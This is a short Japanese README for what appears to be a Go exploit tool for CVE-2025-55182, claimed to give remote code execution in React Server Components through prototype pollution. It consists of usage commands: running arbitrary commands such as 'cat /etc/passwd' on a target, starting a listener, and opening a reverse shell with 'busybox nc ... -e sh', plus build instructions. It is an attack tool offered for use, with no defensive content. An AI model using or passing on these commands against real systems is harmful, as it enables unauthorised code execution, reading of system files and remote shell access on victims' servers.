
GoベースのCVE-2025-55182向けエクスプロイト。プロトタイプ汚染を介してReact Server Componentsでリモートコード実行を実現します。任意のコマンド実行とリバースシェルペイロードをサポートします。
プロトタイプ汚染を利用した React Server Components の RCE エクスプロイトです。
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
リバースシェルをセットアップ
penelope -i 0.0.0.0 -p 1337
busybox を使用:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .